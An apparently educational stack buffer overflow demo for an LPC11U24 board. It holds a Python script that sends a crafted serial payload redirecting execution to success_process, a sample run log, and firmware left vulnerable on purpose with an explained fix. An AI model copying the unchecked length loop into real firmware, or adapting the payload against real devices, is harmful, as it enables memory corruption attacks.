LPC11U24 stack buffer overflow demo
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
# please install pyserial
import serial
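# Serial port the demo board enumerates as; change to match your machine.
tty = "/dev/tty.usbserial-FTGD5T90"
# Address of success_process as printed in the firmware's "memory map"
# (0x000003c5 in the sample run on this page).  It is build specific: re-read
# it from the board's own start-up output whenever the firmware is rebuilt.
SUCCESS_PROCESS_ADDR = 0x000003c5
# Total message size.  Byte 0 is the length field that bof_vlun stores in
# bin[0] and uses as its loop bound without comparing it to the 10-byte
# buffer (the "vuln point" marked in the firmware), so 32 overruns bin.
PAYLOAD_LEN = 32

com = serial.Serial(tty, 115200)
try:
    # Accumulate the board's trace as bytes and decode once, instead of
    # decoding byte by byte; stop at the "code:" prompt that bof_vlun prints
    # right before it starts reading input.
    received = bytearray()
    while b"code:" not in received:
        received += com.read(1)
    print(received.decode(errors="replace"))

    print("bof attack start!")
    # Length word first, then the success_process address repeated to fill
    # the message, little-endian (the original appended 0xc5 0x03 0x00 0x00).
    buf = bytearray([PAYLOAD_LEN, 0, 0, 0])
    for _ in range(PAYLOAD_LEN // 4 - 1):
        buf += SUCCESS_PROCESS_ADDR.to_bytes(4, "little")
    com.write(buf)

    print("received message:\n")
    # Echo everything the board sends from here on; stop with Ctrl-C.
    # flush=True keeps the byte-at-a-time output visible when stdout is a pipe.
    while True:
        print(com.read(1).decode(errors="replace"), end="", flush=True)
finally:
    # The original never closed the port; release it on Ctrl-C or error.
    com.close()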
$ ./bof_attacker.py
memory map:
main: 0x000004b1
bof_vlun: 0x000003f5
bof_vlun_pad: 0x00000489
verification: 0x00000395
success_process: 0x000003c5
enter bof_vlun_pad
enter bof_vlun
code:
bof attack start!
received message:
enter bof_vlun
exit bof_vlun
verification error in bof_vuln
exit bof_vlun
enter success_process
verification success!
exit success_process
enter bof_vlun_pad
enter bof_vlun
// LPC11U24 stack buffer overflow vulnerable demo
// using mbed library
// written by Toshifumi Nishinaga
// This code is public domain
#include "mbed.h"
DigitalOut myled(LED1);      // board LED; declared but not referenced anywhere in this file
Serial serial(P0_19,P0_18);  // UART (pins P0_19/P0_18) that carries every trace line below
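// Check a received message.
//
// Returns 1 when data[1] == 0xfe, 0 otherwise; bof_vlun only calls
// success_process on 1.  No length is passed, so nothing here can bound
// the access -- the caller must guarantee at least two valid bytes.
int verification(unsigned char *data)
{
    // Trace the real function name.  The original printed "enter bof_vlun"
    // / "exit bof_vlun" here, which made the sample log on this page show
    // bof_vlun entered twice for one call.
    serial.printf("enter verification\n");
    int ret = (data[1] == 0xfe) ? 1 : 0;
    serial.printf("exit verification\n");
    return ret;
}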
// Report a successful verification on the trace UART.
//
// Its only effect is the three trace lines; main prints this function's
// address as part of the "memory map" at start-up.
void success_process(void)
{
    static const char *const trace[] = {
        "enter success_process\n",
        "verification success!\n",
        "exit success_process\n",
    };
    for (unsigned i = 0; i < sizeof(trace) / sizeof(trace[0]); ++i) {
        serial.printf("%s", trace[i]);
    }
}
// Deliberately vulnerable receive routine -- the target of this demo.
//
// Wire format: one length byte, then (length - 1) data bytes; the message
// is handed to verification() which decides whether success_process runs.
//
// Defect (kept on purpose for the demo): bin holds 10 bytes, but bin[0]
// comes straight from the UART and is used as the loop bound with no
// comparison against sizeof(bin).  Any length above 10 writes past the
// array into the rest of this function's stack frame; the Python script on
// this page sends 32.  The mitigation is a bound before the loop, e.g.
//     if (bin[0] > sizeof(bin)) { serial.printf("bad length\n"); return; }
// and, in real firmware, a stack-protector build so a corrupted frame is
// detected instead of silently executed.
void bof_vlun(void)
{
    unsigned char bin[10];
    serial.printf("enter bof_vlun\n");
    serial.printf("code:");
    // wait data: busy-wait until a byte is available on the UART
    while(!serial.readable());
    // get data length: this value is fully controlled by the sender
    bin[0] = serial.getc();
    ////// vuln point : forget length check//////
    for(int i=1; i < bin[0]; i++) {
        // wait data
        while(!serial.readable());
        // input: i runs up to bin[0]-1, which may be >= sizeof(bin)
        bin[i] = serial.getc();
    }
    ////// vuln point //////
    // verification() only looks at bin[1]; with the page's sample payload
    // that byte is 0, so the error branch below is what the log shows.
    // (The message spells the function "bof_vuln"; the name is bof_vlun.)
    if(verification(bin)) {
        success_process();
    } else {
        serial.printf("verification error in bof_vuln\n");
    }
    serial.printf("exit bof_vlun\n");
}
// Thin wrapper that calls bof_vlun between two trace lines.
// Its only purpose appears to be sitting between main and bof_vlun
// (the "pad" in the name); it holds no state of its own.
void bof_vlun_pad(void)
{
    static const char *const enter_msg = "enter bof_vlun_pad\n";
    static const char *const exit_msg = "exit bof_vlun_pad\n";

    serial.printf("%s", enter_msg);
    bof_vlun();
    serial.printf("%s", exit_msg);
}
// Entry point: configure the UART, print the "memory map" (the function
// addresses the attacker script on this page reads), then run
// bof_vlun_pad forever.
int main(void)
{
    serial.baud(115200);

    // One line per function.  Passing a function pointer to %08x is what
    // the original does; it works on this 32-bit target but is not
    // portable, and taking the address of main is not standard C++.
    serial.printf("memory map:\n");
    serial.printf("main: 0x%08x\n", &main);
    serial.printf("bof_vlun: 0x%08x\n", &bof_vlun);
    serial.printf("bof_vlun_pad: 0x%08x\n", &bof_vlun_pad);
    serial.printf("verification: 0x%08x\n", &verification);
    serial.printf("success_process: 0x%08x\n", &success_process);

    for (;;) {
        bof_vlun_pad();
    }
    return 0;  // never reached; kept for the int main contract
}